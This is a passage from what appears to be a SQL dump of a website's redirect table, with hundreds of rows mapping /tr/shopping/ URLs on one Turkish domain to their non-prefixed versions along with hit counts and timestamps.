00:00:00',301),(68639,'https://3s-technologies.com.tr/tr/shopping/revived/357201772.html',NULL,'https://3s-technologies.com.tr/shopping/revived/357201772.html','',1,0,'2026-06-11 00:25:03','0000-00-00 00:00:00',301),(68640,'https://3s-technologies.com.tr/tr/shopping/singularly/2180412861.html',NULL,'https://3s-technologies.com.tr/shopping/singularly/2180412861.html','',1,0,'2026-06-11 00:25:06','0000-00-00 00:00:00',301),(68641,'https://3s-technologies.com.tr/tr/shopping/tethering/2531102237.html',NULL,'https://3s-technologies.com.tr/shopping/tethering/2531102237.html','',1,0,'2026-06-11 00:25:09','0000-00-00 00:00:00',301),(68642,'https://3s-technologies.com.tr/tr/shopping/morpheus/2804971669.html',NULL,'https://3s-technologies.com.tr/shopping/morpheus/2804971669.html','',1,0,'2026-06-11 00:25:12','0000-00-00 00:00:00',301),(68643,'https://3s-technologies.com.tr/tr/shopping/vesuvian/820223469.html',NULL,'https://3s-technologies.com.tr/shopping/vesuvian/820223469.html','',1,0,'2026-06-11 00:25:15','0000-00-00 00:00:00',301),(68644,'https://3s-technologies.com.tr/tr/shopping/rationalistic/435241541.html',NULL,'https://3s-technologies.com.tr/shopping/rationalistic/435241541.html','',1,0,'2026-06-11 00:25:21','0000-00-00 00:00:00',301),(68645,'https://3s-technologies.com.tr/tr/shopping/abounded/1747562378.html',NULL,'https://3s-technologies.com.tr/shopping/abounded/1747562378.html','',1,0,'2026-06-11 00:25:26','0000-00-00 00:00:00',301),(68646,'https://3s-technologies.com.tr/tr/shopping/strook/119343061.html',NULL,'https://3s-technologies.com.tr/shopping/strook/119343061.html','',1,0,'2026-06-11 00:25:29','0000-00-00 00:00:00',301),(68647,'https://3s-technologies.com.tr/tr/shopping/misbede/3883605488.html',NULL,'https://3s-technologies.com.tr/shopping/misbede/3883605488.html','',1,0,'2026-06-11 00:25:32','0000-00-00 00:00:00',301),(68648,'http://3s-technologies.com.tr/tr/shopping/curves/2059781877.html',NULL,'','',1,0,'2026-06-11 00:25:35','0000-00-00 00:00:00',301),(68649,'https://3s-technologies.com.tr/tr/shopping/wired/808177521.html',NULL,'https://3s-technologies.com.tr/shopping/wired/808177521.html','',1,0,'2026-06-11 00:25:35','0000-00-00 00:00:00',301),(68650,'https://3s-technologies.com.tr/tr/shopping/interreceive/3107612102.html',NULL,'https://3s-technologies.com.tr/shopping/interreceive/3107612102.html','',1,0,'2026-06-11 00:25:38','0000-00-00 00:00:00',301),(68651,'https://3s-technologies.com.tr/tr/shopping/comparing/1522954975.html',NULL,'https://3s-technologies.com.tr/shopping/comparing/1522954975.html','',1,0,'2026-06-11 00:25:41','0000-00-00 00:00:00',301),(68652,'https://3s-technologies.com.tr/tr/shopping/provisor/3108677778.html',NULL,'https://3s-technologies.com.tr/shopping/provisor/3108677778.html','',1,0,'2026-06-11 00:25:44','0000-00-00 00:00:00',301),(68653,'https://3s-technologies.com.tr/tr/shopping/scillitin/3000877312.html',NULL,'https://3s-technologies.com.tr/shopping/scillitin/3000877312.html','',1,0,'2026-06-11 00:25:47','0000-00-00 00:00:00',301),(68654,'https://3s-technologies.com.tr/tr/shopping/synapta/2153111758.html',NULL,'https://3s-technologies.com.tr/shopping/synapta/2153111758.html','',1,0,'2026-06-11 00:25:50','0000-00-00 00:00:00',301),(68655,'https://3s-technologies.com.tr/tr/shopping/laboring/660208655.html',NULL,'https://3s-technologies.com.tr/shopping/laboring/660208655.html','',1,0,'2026-06-11 00:25:53','0000-00-00 00:00:00',301),(68656,'https://3s-technologies.com.tr/tr/shopping/realizing/1543571334.html',NULL,'https://3s-technologies.com.tr/shopping/realizing/1543571334.html','',1,0,'2026-06-11 00:26:01','0000-00-00 00:00:00',301),(68657,'https://3s-technologies.com.tr/tr/shopping/stylet/1886811324.html',NULL,'https://3s-technologies.com.tr/shopping/stylet/1886811324.html','',1,0,'2026-06-11 00:26:03','0000-00-00 00:00:00',301),(68658,'https://3s-technologies.com.tr/tr/shopping/hardbound/3744772902.html',NULL,'https://3s-technologies.com.tr/shopping/hardbound/3744772902.html','',1,0,'2026-06-11 00:26:06','0000-00-00 00:00:00',301),(68659,'https://3s-technologies.com.tr/tr/shopping/misdesert/356249281.html',NULL,'https://3s-technologies.com.tr/shopping/misdesert/356249281.html','',1,0,'2026-06-11 00:26:09','0000-00-00 00:00:00',301),(68660,'https://3s-technologies.com.tr/tr/shopping/blotless/100711233.html',NULL,'https://3s-technologies.com.tr/shopping/blotless/100711233.html','',1,0,'2026-06-11 00:26:12','0000-00-00 00:00:00',301),(68661,'https://3s-technologies.com.tr/tr/shopping/manducable/597787395.html',NULL,'https://3s-technologies.com.tr/shopping/manducable/597787395.html','',1,0,'2026-06-11 00:26:15','0000-00-00 00:00:00',301),(68662,'http://3s-technologies.com.tr/tr/shopping/bonhomie/2863290549.html',NULL,'','',1,0,'2026-06-11 00:26:17','0000-00-00 00:00:00',301),(68663,'https://3s-technologies.com.tr/tr/shopping/goruck/468132417.html',NULL,'https://3s-technologies.com.tr/shopping/goruck/468132417.html','',1,0,'2026-06-11 00:26:18','0000-00-00 00:00:00',301),(68664,'https://3s-technologies.com.tr/tr/shopping/ramification/3433120615.html',NULL,'https://3s-technologies.com.tr/shopping/ramification/3433120615.html','',1,0,'2026-06-11 00:26:21','0000-00-00 00:00:00',301),(68665,'https://3s-technologies.com.tr/tr/shopping/formality/2221874132.html',NULL,'https://3s-technologies.com.tr/shopping/formality/2221874132.html','',1,0,'2026-06-11 00:26:24','0000-00-00 00:00:00',301),(68666,'https://3s-technologies.com.tr/tr/shopping/paring/36633700.html',NULL,'https://3s-technologies.com.tr/shopping/paring/36633700.html','',1,0,'2026-06-11 00:26:27','0000-00-00 00:00:00',301),(68667,'https://3s-technologies.com.tr/tr/shopping/frequenting/4064369113.html',NULL,'https://3s-technologies.com.tr/shopping/frequenting/4064369113.html','',1,0,'2026-06-11 00:26:30','0000-00-00 00:00:00',301),(68668,'https://3s-technologies.com.tr/tr/shopping/schoolteaching/1213726870.html',NULL,'https://3s-technologies.com.tr/shopping/schoolteaching/1213726870.html','',1,0,'2026-06-11 00:26:36','0000-00-00 00:00:00',301),(68669,'https://3s-technologies.com.tr/tr/shopping/palmita/289764634.html',NULL,'https://3s-technologies.com.tr/shopping/palmita/289764634.html','',1,0,'2026-06-11 00:26:39','0000-00-00 00:00:00',301),(68670,'https://3s-technologies.com.tr/tr/shopping/krishnas/3673682415.html',NULL,'https://3s-technologies.com.tr/shopping/krishnas/3673682415.html','',1,0,'2026-06-11 00:26:42','0000-00-00 00:00:00',301),(68671,'https://3s-technologies.com.tr/tr/shopping/confessing/3602819123.html',NULL,'https://3s-technologies.com.tr/shopping/confessing/3602819123.html','',1,0,'2026-06-11 00:26:45','0000-00-00 00:00:00',301),(68672,'https://3s-technologies.com.tr/tr/shopping/hotwire/1368775173.html',NULL,'https://3s-technologies.com.tr/shopping/hotwire/1368775173.html','',1,0,'2026-06-11 00:26:48','0000-00-00 00:00:00',301),(68673,'https://3s-technologies.com.tr/tr/shopping/arboret/3458604685.html',NULL,'https://3s-technologies.com.tr/shopping/arboret/3458604685.html','',1,0,'2026-06-11 00:26:51','0000-00-00 00:00:00',301),(68674,'https://3s-technologies.com.tr/tr/shopping/nerving/3986653643.html',NULL,'https://3s-technologies.com.tr/shopping/nerving/3986653643.html','',1,0,'2026-06-11 00:26:54','0000-00-00 00:00:00',301),(68675,'https://3s-technologies.com.tr/tr/shopping/shielded/3645233904.html',NULL,'https://3s-technologies.com.tr/shopping/shielded/3645233904.html','',1,0,'2026-06-11 00:26:57','0000-00-00 00:00:00',301),(68676,'https://3s-technologies.com.tr/tr/shopping/trabeculate/3346393291.html',NULL,'https://3s-technologies.com.tr/shopping/trabeculate/3346393291.html','',1,0,'2026-06-11 00:27:00','0000-00-00 00:00:00',301),(68677,'https://3s-technologies.com.tr/tr/shopping/trupanea/9937563.html',NULL,'https://3s-technologies.com.tr/shopping/trupanea/9937563.html','',1,0,'2026-06-11 00:27:03','0000-00-00 00:00:00',301),(68678,'https://3s-technologies.com.tr/tr/shopping/diamondback/2495900348.html',NULL,'https://3s-technologies.com.tr/shopping/diamondback/2495900348.html','',1,0,'2026-06-11 00:27:06','0000-00-00 00:00:00',301),(68679,'https://3s-technologies.com.tr/tr/shopping/exquisite/451384512.html',NULL,'https://3s-technologies.com.tr/shopping/exquisite/451384512.html','',1,0,'2026-06-11 00:27:09','0000-00-00 00:00:00',301),(68680,'https://3s-technologies.com.tr/tr/shopping/affliction/2648243786.html',NULL,'https://3s-technologies.com.tr/shopping/affliction/2648243786.html','',1,0,'2026-06-11 00:27:12','0000-00-00 00:00:00',301),(68681,'https://3s-technologies.com.tr/tr/shopping/leuke/1415824134.html',NULL,'https://3s-technologies.com.tr/shopping/leuke/1415824134.html','',1,0,'2026-06-11 00:27:15','0000-00-00 00:00:00',301),(68682,'https://3s-technologies.com.tr/tr/shopping/flattering/1739219178.html',NULL,'https://3s-technologies.com.tr/shopping/flattering/1739219178.html','',1,0,'2026-06-11 00:27:18','0000-00-00 00:00:00',301),(68683,'https://3s-technologies.com.tr/tr/shopping/steeve/3966529033.html',NULL,'https://3s-technologies.com.tr/shopping/steeve/3966529033.html','',1,0,'2026-06-11 00:27:21','0000-00-00 00:00:00',301),(68684,'https://3s-technologies.com.tr/tr/shopping/frittered/2313697365.html',NULL,'https://3s-technologies.com.tr/shopping/frittered/2313697365.html','',1,0,'2026-06-11 00:27:24','0000-00-00 00:00:00',301),(68685,'https://3s-technologies.com.tr/tr/shopping/topically/1590392097.html',NULL,'https://3s-technologies.com.tr/shopping/topically/1590392097.html','',1,0,'2026-06-11 00:27:27','0000-00-00 00:00:00',301),(68686,'https://3s-technologies.com.tr/tr/shopping/apsides/3773772868.html',NULL,'https://3s-technologies.com.tr/shopping/apsides/3773772868.html','',1,0,'2026-06-11 00:27:30','0000-00-00 00:00:00',301),(68687,'https://3s-technologies.com.tr/tr/shopping/diagnosticate/640084061.html',NULL,'https://3s-technologies.com.tr/shopping/diagnosticate/640084061.html','',1,0,'2026-06-11 00:27:33','0000-00-00 00:00:00',301),(68688,'https://3s-technologies.com.tr/tr/shopping/skeel/1908148017.html',NULL,'https://3s-technologies.com.tr/shopping/skeel/1908148017.html','',1,0,'2026-06-11 00:27:36','0000-00-00 00:00:00',301),(68689,'https://3s-technologies.com.tr/tr/shopping/protending/2374234686.html',NULL,'https://3s-technologies.com.tr/shopping/protending/2374234686.html','',1,0,'2026-06-11 00:27:39','0000-00-00 00:00:00',301),(68690,'https://3s-technologies.com.tr/tr/shopping/timocratic/3947292255.html',NULL,'https://3s-technologies.com.tr/shopping/timocratic/3947292255.html','',1,0,'2026-06-11 00:27:42','0000-00-00 00:00:00',301),(68691,'https://3s-technologies.com.tr/tr/shopping/stoup/743559290.html',NULL,'https://3s-technologies.com.tr/shopping/stoup/743559290.html','',1,0,'2026-06-11 00:27:50','0000-00-00 00:00:00',301),(68692,'https://3s-technologies.com.tr/tr/shopping/jeterus/4113071616.html',NULL,'https://3s-technologies.com.tr/shopping/jeterus/4113071616.html','',1,0,'2026-06-11 00:27:52','0000-00-00 00:00:00',301),(68693,'https://3s-technologies.com.tr/tr/shopping/makable/3612013783.html',NULL,'https://3s-technologies.com.tr/shopping/makable/3612013783.html','',1,0,'2026-06-11 00:27:55','0000-00-00 00:00:00',301),(68694,'https://3s-technologies.com.tr/tr/shopping/moabite/3580711774.html',NULL,'https://3s-technologies.com.tr/shopping/moabite/3580711774.html','',1,0,'2026-06-11 00:27:58','0000-00-00 00:00:00',301),(68695,'https://3s-technologies.com.tr/tr/shopping/notself/3685301257.html',NULL,'https://3s-technologies.com.tr/shopping/notself/3685301257.html','',1,0,'2026-06-11 00:28:01','0000-00-00 00:00:00',301),(68696,'https://3s-technologies.com.tr/tr/shopping/slitting/2851022747.html',NULL,'https://3s-technologies.com.tr/shopping/slitting/2851022747.html','',1,0,'2026-06-11 00:28:04','0000-00-00 00:00:00',301),(68697,'https://3s-technologies.com.tr/tr/shopping/monodic/2275888472.html',NULL,'https://3s-technologies.com.tr/shopping/monodic/2275888472.html','',1,0,'2026-06-11 00:28:07','0000-00-00 00:00:00',301),(68698,'https://3s-technologies.com.tr/tr/shopping/criterion/1507860580.html',NULL,'https://3s-technologies.com.tr/shopping/criterion/1507860580.html','',1,0,'2026-06-11 00:28:10','0000-00-00 00:00:00',301),(68699,'https://3s-technologies.com.tr/tr/shopping/microphyllous/3452704950.html',NULL,'https://3s-technologies.com.tr/shopping/microphyllous/3452704950.html','',1,0,'2026-06-11 00:28:13','0000-00-00 00:00:00',301),(68700,'https://3s-technologies.com.tr/tr/shopping/indomable/550803125.html',NULL,'https://3s-technologies.com.tr/shopping/indomable/550803125.html','',1,0,'2026-06-11 00:28:16','0000-00-00 00:00:00',301),(68701,'https://3s-technologies.com.tr/tr/shopping/voraciousness/2335804730.html',NULL,'https://3s-technologies.com.tr/shopping/voraciousness/2335804730.html','',1,0,'2026-06-11 00:28:19','0000-00-00 00:00:00',301),(68702,'https://3s-technologies.com.tr/tr/shopping/distributively/372555759.html',NULL,'https://3s-technologies.com.tr/shopping/distributively/372555759.html','',1,0,'2026-06-11 00:28:22','0000-00-00 00:00:00',301),(68703,'https://3s-technologies.com.tr/tr/shopping/ghast/436914366.html',NULL,'https://3s-technologies.com.tr/shopping/ghast/436914366.html','',1,0,'2026-06-11 00:28:25','0000-00-00 00:00:00',301),(68704,'https://3s-technologies.com.tr/tr/shopping/ported/2755726724.html',NULL,'https://3s-technologies.com.tr/shopping/ported/2755726724.html','',1,0,'2026-06-11 00:28:28','0000-00-00 00:00:00',301),(68705,'https://3s-technologies.com.tr/tr/shopping/anxious/2108197819.html',NULL,'https://3s-technologies.com.tr/shopping/anxious/2108197819.html','',1,0,'2026-06-11 00:28:31','0000-00-00 00:00:00',301),(68706,'https://3s-technologies.com.tr/tr/shopping/plumed/3650362935.html',NULL,'https://3s-technologies.com.tr/shopping/plumed/3650362935.html','',1,0,'2026-06-11 00:28:34','0000-00-00 00:00:00',301),(68707,'https://3s-technologies.com.tr/tr/shopping/conventional/1230361606.html',NULL,'https://3s-technologies.com.tr/shopping/conventional/1230361606.html','',1,0,'2026-06-11 00:28:37','0000-00-00 00:00:00',301),(68708,'http://3s-technologies.com.tr/tr/shopping/falconet/969593907.html',NULL,'','',1,0,'2026-06-11 00:28:38','0000-00-00 00:00:00',301),(68709,'https://3s-technologies.com.tr/tr/shopping/requisitionist/3090977366.html',NULL,'https://3s-technologies.com.tr/shopping/requisitionist/3090977366.html','',1,0,'2026-06-11 00:28:40','0000-00-00 00:00:00',301),(68710,'http://3s-technologies.com.tr/tr/shopping/proparoxytone/2044687498.html',NULL,'','',1,0,'2026-06-11 00:28:41','0000-00-00 00:00:00',301),(68711,'https://3s-technologies.com.tr/tr/shopping/lambing/1335178348.html',NULL,'https://3s-technologies.com.tr/shopping/lambing/1335178348.html','',1,0,'2026-06-11 00:28:43','0000-00-00 00:00:00',301),(68712,'http://3s-technologies.com.tr/tr/shopping/sublingua/801500463.html',NULL,'','',2,0,'2026-06-11 00:28:44','0000-00-00 00:00:00',301),(68713,'https://3s-technologies.com.tr/tr/shopping/stave/3916938746.html',NULL,'https://3s-technologies.com.tr/shopping/stave/3916938746.html','',1,0,'2026-06-11 00:28:46','0000-00-00 00:00:00',301),(68714,'http://3s-technologies.com.tr/tr/shopping/sultana/1208476127.html',NULL,'','',1,0,'2026-06-11 00:28:49','0000-00-00 00:00:00',301),(68715,'https://3s-technologies.com.tr/tr/shopping/postponing/442043397.html',NULL,'https://3s-technologies.com.tr/shopping/postponing/442043397.html','',1,0,'2026-06-11 00:28:49','0000-00-00 00:00:00',301),(68716,'http://3s-technologies.com.tr/tr/shopping/salivating/3164946126.html',NULL,'','',2,0,'2026-06-11 00:28:51','0000-00-00 00:00:00',301),(68717,'https://3s-technologies.com.tr/tr/shopping/consummated/666173049.html',NULL,'https://3s-technologies.com.tr/shopping/consummated/666173049.html','',1,0,'2026-06-11 00:28:52','0000-00-00 00:00:00',301),(68718,'http://3s-technologies.com.tr/tr/shopping/aboriginally/2501202771.html',NULL,'','',2,0,'2026-06-11 00:28:54','0000-00-00 00:00:00',301),(68719,'https://3s-technologies.com.tr/tr/shopping/abstrusity/4133966882.html',NULL,'https://3s-technologies.com.tr/shopping/abstrusity/4133966882.html','',1,0,'2026-06-11 00:28:57','0000-00-00 00:00:00',301),(68720,'https://3s-technologies.com.tr/tr/shopping/bragi/3265848504.html',NULL,'https://3s-technologies.com.tr/shopping/bragi/3265848504.html','',1,0,'2026-06-11 00:28:59','0000-00-00 00:00:00',301),(68721,'https://3s-technologies.com.tr/tr/shopping/ageratoides/3313338908.html',NULL,'https://3s-technologies.com.tr/shopping/ageratoides/3313338908.html','',1,0,'2026-06-11 00:29:02','0000-00-00 00:00:00',301),(68722,'https://3s-technologies.com.tr/tr/shopping/patripassian/3607424995.html',NULL,'https://3s-technologies.com.tr/shopping/patripassian/3607424995.html','',1,0,'2026-06-11 00:29:05','0000-00-00 00:00:00',301),(68723,'https://3s-technologies.com.tr/tr/shopping/hispidus/2821557054.html',NULL,'https://3s-technologies.com.tr/shopping/hispidus/2821557054.html','',1,0,'2026-06-11 00:29:08','0000-00-00 00:00:00',301),(68724,'https://3s-technologies.com.tr/tr/shopping/steadiness/1552862095.html',NULL,'https://3s-technologies.com.tr/shopping/steadiness/1552862095.html','',1,0,'2026-06-11 00:29:11','0000-00-00 00:00:00',301),(68725,'https://3s-technologies.com.tr/tr/shopping/outblown/1786417664.html',NULL,'https://3s-technologies.com.tr/shopping/outblown/1786417664.html','',1,0,'2026-06-11 00:29:14','0000-00-00 00:00:00',301),(68726,'https://3s-technologies.com.tr/tr/shopping/unciae/2690437108.html',NULL,'https://3s-technologies.com.tr/shopping/unciae/2690437108.html','',1,0,'2026-06-11 00:29:17','0000-00-00 00:00:00',301),(68727,'https://3s-technologies.com.tr/tr/shopping/pithful/3969905722.html',NULL,'https://3s-technologies.com.tr/shopping/pithful/3969905722.html','',1,0,'2026-06-11 00:29:20','0000-00-00 00:00:00',301),(68728,'https://3s-technologies.com.tr/tr/shopping/whereso/369968022.html',NULL,'https://3s-technologies.com.tr/shopping/whereso/369968022.html','',1,0,'2026-06-11 00:29:23','0000-00-00 00:00:00',301),(68729,'https://3s-technologies.com.tr/tr/shopping/nymphet/276933693.html',NULL,'https://3s-technologies.com.tr/shopping/nymphet/276933693.html','',1,0,'2026-06-11 00:29:26','0000-00-00 00:00:00',301),(68730,'https://3s-technologies.com.tr/tr/shopping/illsorted/1702788106.html',NULL,'https://3s-technologies.com.tr/shopping/illsorted/1702788106.html','',1,0,'2026-06-11 00:29:29','0000-00-00 00:00:00',301),(68731,'https://3s-technologies.com.tr/tr/shopping/defied/138520126.html',NULL,'https://3s-technologies.com.tr/shopping/defied/138520126.html','',1,0,'2026-06-11 00:29:32','0000-00-00 00:00:00',301),(68732,'https://3s-technologies.com.tr/tr/shopping/mutoscope/918010125.html',NULL,'https://3s-technologies.com.tr/shopping/mutoscope/918010125.html','',1,0,'2026-06-11 00:29:35','0000-00-00 00:00:00',301),(68733,'https://3s-technologies.com.tr/tr/shopping/possession/2088073209.html',NULL,'https://3s-technologies.com.tr/shopping/possession/2088073209.html','',1,0,'2026-06-11 00:29:38','0000-00-00 00:00:00',301),(68734,'https://3s-technologies.com.tr/tr/shopping/underpeer/3317255856.html',NULL,'https://3s-technologies.com.tr/shopping/underpeer/3317255856.html','',1,0,'2026-06-11 00:29:41','0000-00-00 00:00:00',301),(68735,'https://3s-technologies.com.tr/tr/shopping/quinary/3690053584.html',NULL,'https://3s-technologies.com.tr/shopping/quinary/3690053584.html','',1,0,'2026-06-11 00:29:44','0000-00-00 00:00:00',301),(68736,'https://3s-technologies.com.tr/tr/shopping/remuable/2121799432.html',NULL,'https://3s-technologies.com.tr/shopping/remuable/2121799432.html','',1,0,'2026-06-11 00:29:47','0000-00-00 00:00:00',301),(68737,'https://3s-technologies.com.tr/tr/shopping/lastly/2274676373.html',NULL,'https://3s-technologies.com.tr/shopping/lastly/2274676373.html','',1,0,'2026-06-11 00:29:50','0000-00-00 00:00:00',301),(68738,'https://3s-technologies.com.tr/tr/shopping/mooter/2880587256.html',NULL,'https://3s-technologies.com.tr/shopping/mooter/2880587256.html','',1,0,'2026-06-11 00:29:53','0000-00-00 00:00:00',301),(68739,'https://3s-technologies.com.tr/tr/shopping/episcopize/2046561584.html',NULL,'https://3s-technologies.com.tr/shopping/episcopize/2046561584.html','',1,0,'2026-06-11 00:29:56','0000-00-00 00:00:00',301),(68740,'https://3s-technologies.com.tr/tr/shopping/wastefully/304841929.html',NULL,'https://3s-technologies.com.tr/shopping/wastefully/304841929.html','',1,0,'2026-06-11 00:29:59','0000-00-00 00:00:00',301),(68741,'https://3s-technologies.com.tr/tr/shopping/philomachus/429277147.html',NULL,'https://3s-technologies.com.tr/shopping/philomachus/429277147.html','',1,0,'2026-06-11 00:30:02','0000-00-00 00:00:00',301),(68742,'https://3s-technologies.com.tr/tr/shopping/fight/4158680248.html',NULL,'https://3s-technologies.com.tr/shopping/fight/4158680248.html','',1,0,'2026-06-11 00:30:05','0000-00-00 00:00:00',301),(68743,'https://3s-technologies.com.tr/tr/shopping/feriation/3277467378.html',NULL,'https://3s-technologies.com.tr/shopping/feriation/3277467378.html','',1,0,'2026-06-11 00:30:08','0000-00-00 00:00:00',301),(68744,'https://3s-technologies.com.tr/tr/shopping/hided/3382990069.html',NULL,'https://3s-technologies.com.tr/shopping/hided/3382990069.html','',1,0,'2026-06-11 00:30:11','0000-00-00 00:00:00',301),(68745,'https://3s-technologies.com.tr/tr/shopping/competing/1903559229.html',NULL,'https://3s-technologies.com.tr/shopping/competing/1903559229.html','',1,0,'2026-06-11 00:30:14','0000-00-00 00:00:00',301),(68746,'https://3s-technologies.com.tr/tr/shopping/communicating/3594594038.html',NULL,'https://3s-technologies.com.tr/shopping/communicating/3594594038.html','',1,0,'2026-06-11 00:30:17','0000-00-00 00:00:00',301),(68747,'https://3s-technologies.com.tr/tr/shopping/sharking/2516171365.html',NULL,'https://3s-technologies.com.tr/shopping/sharking/2516171365.html','',1,0,'2026-06-11 00:30:20','0000-00-00 00:00:00',301),(68748,'https://3s-technologies.com.tr/tr/shopping/restoratively/406824424.html',NULL,'https://3s-technologies.com.tr/shopping/restoratively/406824424.html','',1,0,'2026-06-11 00:30:25','0000-00-00 00:00:00',301),(68749,'https://3s-technologies.com.tr/tr/shopping/darken/55709718.html',NULL,'https://3s-technologies.com.tr/shopping/darken/55709718.html','',1,0,'2026-06-11 00:30:29','0000-00-00 00:00:00',301),(68750,'https://3s-technologies.com.tr/tr/shopping/papejay/2041859627.html',NULL,'https://3s-technologies.com.tr/shopping/papejay/2041859627.html','',1,0,'2026-06-11 00:30:32','0000-00-00 00:00:00',301),(68751,'https://3s-technologies.com.tr/tr/shopping/unmuzzle/2687060419.html',NULL,'https://3s-technologies.com.tr/shopping/unmuzzle/2687060419.html','',1,0,'2026-06-11 00:30:35','0000-00-00 00:00:00',301),(68752,'https://3s-technologies.com.tr/tr/shopping/enchorial/2938419728.html',NULL,'https://3s-technologies.com.tr/shopping/enchorial/2938419728.html','',1,0,'2026-06-11 00:30:38','0000-00-00 00:00:00',301),(68753,'https://3s-technologies.com.tr/tr/shopping/undulate/3199597887.html',NULL,'https://3s-technologies.com.tr/shopping/undulate/3199597887.html','',1,0,'2026-06-11 00:30:41','0000-00-00 00:00:00',301),(68754,'https://3s-technologies.com.tr/tr/shopping/useful/3983163769.html',NULL,'https://3s-technologies.com.tr/shopping/useful/3983163769.html','',1,0,'2026-06-11 00:30:44','0000-00-00 00:00:00',301),(68755,'https://3s-technologies.com.tr/tr/shopping/primigenious/3417093028.html',NULL,'https://3s-technologies.com.tr/shopping/primigenious/3417093028.html','',1,0,'2026-06-11 00:30:47','0000-00-00 00:00:00',301),(68756,'https://3s-technologies.com.tr/tr/shopping/coercively/665422694.html',NULL,'https://3s-technologies.com.tr/shopping/coercively/665422694.html','',1,0,'2026-06-11 00:30:51','0000-00-00 00:00:00',301),(68757,'https://3s-technologies.com.tr/tr/shopping/abruzzi/3062711724.html',NULL,'https://3s-technologies.com.tr/shopping/abruzzi/3062711724.html','',1,0,'2026-06-11 00:30:53','0000-00-00 00:00:00',301),(68758,'https://3s-technologies.com.tr/tr/shopping/proselyte/349157764.html',NULL,'https://3s-technologies.com.tr/shopping/proselyte/349157764.html','',1,0,'2026-06-11 00:30:56','0000-00-00 00:00:00',301),(68759,'https://3s-technologies.com.tr/tr/shopping/philosopheme/3969318890.html',NULL,'https://3s-technologies.com.tr/shopping/philosopheme/3969318890.html','',1,0,'2026-06-11 00:30:59','0000-00-00 00:00:00',301),(68760,'https://3s-technologies.com.tr/tr/shopping/tinea/1960528161.html',NULL,'https://3s-technologies.com.tr/shopping/tinea/1960528161.html','',1,0,'2026-06-11 00:31:02','0000-00-00 00:00:00',301),(68761,'https://3s-technologies.com.tr/tr/shopping/punctator/570571300.html',NULL,'https://3s-technologies.com.tr/shopping/punctator/570571300.html','',1,0,'2026-06-11 00:31:05','0000-00-00 00:00:00',301),(68762,'https://3s-technologies.com.tr/tr/shopping/hypotenuse/1636765219.html',NULL,'https://3s-technologies.com.tr/shopping/hypotenuse/1636765219.html','',1,0,'2026-06-11 00:31:08','0000-00-00 00:00:00',301),(68763,'https://3s-technologies.com.tr/tr/shopping/wrung/284031671.html',NULL,'https://3s-technologies.com.tr/shopping/wrung/284031671.html','',1,0,'2026-06-11 00:31:11','0000-00-00 00:00:00',301),(68764,'https://3s-technologies.com.tr/tr/shopping/dystome/1809773294.html',NULL,'https://3s-technologies.com.tr/shopping/dystome/1809773294.html','',1,0,'2026-06-11 00:31:14','0000-00-00 00:00:00',301),(68765,'https://3s-technologies.com.tr/tr/shopping/lustrous/2759448045.html',NULL,'https://3s-technologies.com.tr/shopping/lustrous/2759448045.html','',1,0,'2026-06-11 00:31:17','0000-00-00 00:00:00',301),(68766,'https://3s-technologies.com.tr/tr/shopping/vowed/3923105308.html',NULL,'https://3s-technologies.com.tr/shopping/vowed/3923105308.html','',1,0,'2026-06-11 00:31:20','0000-00-00 00:00:00',301),(68767,'https://3s-technologies.com.tr/tr/shopping/clambering/2529744469.html',NULL,'https://3s-technologies.com.tr/shopping/clambering/2529744469.html','',1,0,'2026-06-11 00:31:23','0000-00-00 00:00:00',301),(68768,'https://3s-technologies.com.tr/tr/shopping/dolce/4050735364.html',NULL,'https://3s-technologies.com.tr/shopping/dolce/4050735364.html','',1,0,'2026-06-11 00:31:26','0000-00-00 00:00:00',301),(68769,'https://3s-technologies.com.tr/tr/shopping/disorder/1373448969.html',NULL,'https://3s-technologies.com.tr/shopping/disorder/1373448969.html','',1,0,'2026-06-11 00:31:29','0000-00-00 00:00:00',301),(68770,'https://3s-technologies.com.tr/tr/shopping/atone/4275006783.html',NULL,'https://3s-technologies.com.tr/shopping/atone/4275006783.html','',1,0,'2026-06-11 00:31:32','0000-00-00 00:00:00',301),(68771,'https://3s-technologies.com.tr/tr/shopping/pepastic/3550889662.html',NULL,'https://3s-technologies.com.tr/shopping/pepastic/3550889662.html','',1,0,'2026-06-11 00:31:35','0000-00-00 00:00:00',301),(68772,'https://3s-technologies.com.tr/tr/shopping/augustness/889792681.html',NULL,'https://3s-technologies.com.tr/shopping/augustness/889792681.html','',1,0,'2026-06-11 00:31:38','0000-00-00 00:00:00',301),(68773,'https://3s-technologies.com.tr/tr/shopping/junceum/1486754970.html',NULL,'https://3s-technologies.com.tr/shopping/junceum/1486754970.html','',1,0,'2026-06-11 00:31:41','0000-00-00 00:00:00',301),(68774,'https://3s-technologies.com.tr/tr/shopping/noropianic/1929649818.html',NULL,'https://3s-technologies.com.tr/shopping/noropianic/1929649818.html','',1,0,'2026-06-11 00:31:44','0000-00-00 00:00:00',301),(68775,'https://3s-technologies.com.tr/tr/shopping/oaken/344338331.html',NULL,'https://3s-technologies.com.tr/shopping/oaken/344338331.html','',1,0,'2026-06-11 00:31:47','0000-00-00 00:00:00',301),(68776,'https://3s-technologies.com.tr/tr/shopping/subcostal/3923811682.html',NULL,'https://3s-technologies.com.tr/shopping/subcostal/3923811682.html','',1,0,'2026-06-11 00:31:50','0000-00-00 00:00:00',301),(68777,'https://3s-technologies.com.tr/tr/shopping/booklearned/2731705515.html',NULL,'https://3s-technologies.com.tr/shopping/booklearned/2731705515.html','',1,0,'2026-06-11 00:31:53','0000-00-00 00:00:00',301),(68778,'https://3s-technologies.com.tr/tr/shopping/deleteriousness/978405211.html',NULL,'https://3s-technologies.com.tr/shopping/deleteriousness/978405211.html','',1,0,'2026-06-11 00:31:56','0000-00-00 00:00:00',301),(68779,'https://3s-technologies.com.tr/tr/shopping/offenses/959703466.html',NULL,'https://3s-technologies.com.tr/shopping/offenses/959703466.html','',1,0,'2026-06-11 00:31:59','0000-00-00 00:00:00',301),(68780,'https://3s-technologies.com.tr/tr/shopping/disconformity/2558606463.html',NULL,'https://3s-technologies.com.tr/shopping/disconformity/2558606463.html','',1,0,'2026-06-11 00:32:06','0000-00-00 00:00:00',301),(68781,'https://3s-technologies.com.tr/tr/shopping/officiant/736285986.html',NULL,'https://3s-technologies.com.tr/shopping/officiant/736285986.html','',1,0,'2026-06-11 00:32:08','0000-00-00 00:00:00',301),(68782,'https://3s-technologies.com.tr/tr/shopping/unnerve/3978659989.html',NULL,'https://3s-technologies.com.tr/shopping/unnerve/3978659989.html','',1,0,'2026-06-11 00:32:11','0000-00-00 